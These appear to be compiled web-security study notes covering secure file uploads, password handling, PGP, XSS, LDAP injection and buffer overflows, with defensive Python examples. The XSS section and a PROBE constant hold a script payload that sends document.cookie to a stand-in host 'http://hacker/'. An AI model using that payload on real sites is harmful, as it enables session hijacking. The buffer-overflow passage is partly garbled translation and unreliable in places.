HPE Security Fortify Static Code Analyzer (SCA)
http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://github.com/thoughtbot/guides/tree/master/security
- Use HSTS headers to enforce HTTPS traffic.
- Use secure cookies.
- Avoid protocol-relative URLs.
- Don't store passwords in plain text.
- Don't hash passwords using a reversible cipher.
- Don't hash passwords using a broken cipher, such as MD5 or SHA1.
- Don't accept passwords or session tokens over HTTP.
PGP and GnuPG
- Use a PGP signature in an email if you want somebody to trust that you wrote it.
- Use PGP to check email signatures if you want to know who wrote it.
- Use PGP to encrypt emails if you want to be sure nobody but the recipient is reading it.
- Use ultimate trust for your own keys.
- Use full trust for keys you have verified in person or via a secure video chat.
- Don't share your private key with anyone, including services like Keybase.
- Keep at least one backup of your private key and revocation certificate in a secure location, such as a thumb drive.
- Use a tool like pwgen or 1password to generate random passwords.
- Use a tool like GnuPG to encrypt passwords if you need to share them with somebody.
- Never accept a filename and its extension directly without a white-list filter.
- The web application must hold a list of permitted extensions, and the stored file's extension should be selected from that list rather than taken from the upload. For instance, a "select case" statement (in VBScript) can map the real file extension onto one of the permitted values.
- All control characters and Unicode characters should be removed from filenames and their extensions without exception. Special characters such as ";", ":", ">", "<", "/", "\", additional ".", "*", "%", "$", and so on should be discarded as well. If Unicode characters are not needed, it is highly recommended to accept only alphanumeric characters and exactly one dot for the file name and extension, with neither part empty (regular expression: [a-zA-Z0-9]{1,200}\.[a-zA-Z0-9]{1,10}).
- Limit the filename length. For instance, the name of a file plus its extension (excluding the directory) should be less than 255 characters on an NTFS partition.
- It is recommended to derive filenames algorithmically. For instance, a filename can be the MD5 hash of the original name plus the current date.
- The upload directory should not have any "execute" permission.
- Limit the file size to a maximum value in order to prevent denial of service attacks (on file space or on other web application functions such as the image resizer).
- Reject very small files as well, since they can also be used for denial of service; a minimum file size should be enforced.
- Use Cross Site Request Forgery protection methods.
- Prevent overwriting an existing file when both files produce the same hash.
- Use a virus scanner on the server (if applicable). If the file contents are not confidential, a free online virus-scanning service can be used instead; in that case the file should first be stored under a random name without any extension, and only after the scan result comes back should it be renamed to its final name and extension.
- Prefer the POST method over PUT (or GET!).
- Log users' activities; the logging mechanism itself should be secured against log forgery and code injection.
- If the application extracts compressed files, each file inside the archive should be checked individually as a new upload.
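The filename and size rules above, applied together, as an added Python example (not code from the OWASP guidance or any project): the regular expression from the list, an extension allow-list, length and size limits, the MD5-derived stored name, and a write that refuses to overwrite. The allow-list, the size bounds and the 0o600 mode are assumed values for this example.

```python
import hashlib
import os
import re
from datetime import date

ALLOWED_EXTENSIONS = {"jpg", "png", "pdf"}          # assumed allow-list for this example
FILENAME_RE = re.compile(r"^[a-zA-Z0-9]{1,200}\.[a-zA-Z0-9]{1,10}$")  # rule from the list above
MAX_NAME_LEN = 254                                  # name + extension stays under 255 (NTFS)
MIN_SIZE, MAX_SIZE = 1, 5 * 1024 * 1024             # assumed bounds: 1 byte .. 5 MiB


def validate_upload(filename: str, size: int) -> str:
    """Return the permitted extension when every check passes; raise ValueError otherwise."""
    if len(filename) > MAX_NAME_LEN:
        raise ValueError("filename too long")
    if not FILENAME_RE.fullmatch(filename):
        # Also rejects control characters, path separators, extra dots, "%", "$", ...
        raise ValueError("filename contains disallowed characters")
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not permitted")
    if not MIN_SIZE <= size <= MAX_SIZE:
        raise ValueError("file size outside permitted range")
    return ext


def is_acceptable(filename: str, size: int) -> bool:
    """Boolean wrapper around validate_upload for callers that only need yes/no."""
    try:
        validate_upload(filename, size)
        return True
    except ValueError:
        return False


def stored_name(filename: str, day: str) -> str:
    """Derive the on-disk name from an MD5 of the original name plus the ISO date, as suggested above."""
    return hashlib.md5(f"{filename}{day}".encode()).hexdigest()


def save_upload(upload_dir: str, filename: str, data: bytes) -> str:
    """Validate, rename, and write with O_EXCL so an existing file with the same name is never overwritten."""
    ext = validate_upload(filename, len(data))
    target = os.path.join(upload_dir, stored_name(filename, date.today().isoformat()) + "." + ext)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)  # no execute bit
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return target
```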
OWASP Top Ten 2013 Project
https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents
https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/
IEEE Top Design Flaws
http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html
https://dzone.com/articles/java-serialization-vulnerability-threatens-million
The problem is that there’s no way to know what you’re deserializing before you’ve decoded it. So an attacker can serialize a bunch of malicious objects and send them to your application. Once you call readObject(), it’s too late. In some ways it’s like an XXE problem, where an attacker can use a malicious DOCTYPE to generate attacks during XML parsing. But in this case, there’s no easy way to turn off DOCTYPE processing.
XSS
http://www.veracode.com/security/xss
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has the value Cross-Site Scripting, results in the following HTML being emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
the attacker, sitting at the other end on the web server, receives hits in which the user's cookie follows a double space. If an administrator clicks the link, the attacker could steal the session ID and hijack the session.
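The mitigation for both snippets above is output encoding at the point where the value is interpolated. This is an added Python example, not code from the Veracode page: the page's `%(title)` template rendered verbatim and with entity encoding, and a constructed search-results template that reflects the query the same way. `html.escape` covers element text and quoted attribute values only; a value placed inside a script block or a URL needs its own encoder.

```python
import html

# The page's template, written as a Python %-format string (the page shows "%(title)").
TITLE_TEMPLATE = "<title>Example document: %(title)s</title>"
# Constructed template that echoes a search term, as in the search-field example above.
SEARCH_TEMPLATE = '<input name="q" value="%(q)s"><p>Results for %(q)s</p>'


def render_title_unescaped(title: str) -> str:
    """The snippet as written on the page: the variable is interpolated verbatim."""
    return TITLE_TEMPLATE % {"title": title}


def render_title(title: str) -> str:
    """Entity-encode the value so it stays text: & < > " ' become &amp; &lt; &gt; &quot; &#x27;."""
    return TITLE_TEMPLATE % {"title": html.escape(title, quote=True)}


def render_search(query: str) -> str:
    """Same rule for reflected input: encode before placing it in an attribute or element body."""
    return SEARCH_TEMPLATE % {"q": html.escape(query, quote=True)}


def introduces_markup(template: str, rendered: str) -> bool:
    """Check: did the interpolated value add tag delimiters beyond those in the template itself?"""
    return rendered.count("<") > template.count("<") or rendered.count(">") > template.count(">")


# Constructed input of the same shape as the search-query example above.
PROBE = '"><SCRIPT>img.src="http://hacker/" + document.cookie</SCRIPT>'
```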
LDAP Injection
http://searchsoftwarequality.techtarget.com/definition/LDAP-injection
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
https://docs.kentico.com/display/K7SG/Lightweight+Directory+Access+Protocol+(LDAP)+injection
http://docs.spring.io/spring-ldap/docs/current/reference/
In addition to simplifying building of complex search parameters, the LdapQueryBuilder and its associated classes also provide proper escaping of any unsafe characters in search filters. This prevents "ldap injection", where a user might use such characters to inject unwanted operations into your LDAP operations.
http://segmentfault.com/a/1190000004030596
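The escaping that the Spring LDAP text describes, as an added Python example (not Spring LDAP's code and not from any of the linked pages): the RFC 4515 escapes for `\`, `*`, `(`, `)` and NUL, a login filter built both by naive concatenation and with escaping, and a structural check on the generated filter. The filter shape and the attribute names `uid` and `userPassword` are assumptions for this example.

```python
# RFC 4515 escaping for a value placed inside an LDAP search filter.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Replace filter metacharacters with \\XX hex escapes so the value cannot alter the filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def unsafe_login_filter(user: str, password: str) -> str:
    """Naive concatenation: metacharacters in the input become filter syntax."""
    return f"(&(uid={user})(userPassword={password}))"


def safe_login_filter(user: str, password: str) -> str:
    """Same filter with both values escaped; the filter structure is fixed by the code."""
    return f"(&(uid={escape_filter_value(user)})(userPassword={escape_filter_value(password)}))"


def raw_paren_count(filt: str) -> int:
    """Count unescaped parentheses; escaped ones appear as \\28 / \\29 and are not counted."""
    return filt.count("(") + filt.count(")")


# A well-formed login filter of the shape above always has exactly 6 raw parentheses.
EXPECTED_PARENS = 6


def filter_shape_ok(filt: str) -> bool:
    """Cheap structural check a reviewer or log monitor can apply to a generated filter."""
    return raw_paren_count(filt) == EXPECTED_PARENS
```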
Buffer Overflow
For example: storing 10 bytes of data into a buffer that was allocated only 8 bytes.
Principle:
Simply put, a buffer overflow is copying an overly long string into a buffer of limited size, overwriting adjacent storage units; this causes the program to fail.
Because variables are kept on the stack, when a buffer overflow occurs the function return address stored on the stack is overwritten as well. The overflow thus corrupts the program's stack and makes the program execute other instructions, which is the attacker's goal.
A program in memory is usually divided into three parts: the code segment, the data segment and the stack segment. Dynamic data is stored on the stack.
When a function call occurs in a program, the computer does the following:
- First, the arguments are pushed onto the stack;
- Then the contents of the instruction pointer (IP) are saved as the return address (RET);
- The third item pushed onto the stack is the base pointer register (BP); the current stack pointer (SP) is then copied into BP as the new base address;
- Finally, space is reserved for local variables by subtracting an appropriate value from SP.
BP and RET are overwritten by the excess str, and the overwritten location is exactly the entry point of the program the attacker wants to execute!
Use null pointers to raise the odds of guessing correctly.
Github Hacking
http://tech.163.com/16/0122/06/BDTP3FUP000915BD.html
history.pushState() is an API introduced in HTML5; pushState adds the specified URL to the browser history, storing the current history point. While i<100000, the loop keeps recording total into the browser history; after enough repetitions the browser can no longer cope and simply crashes.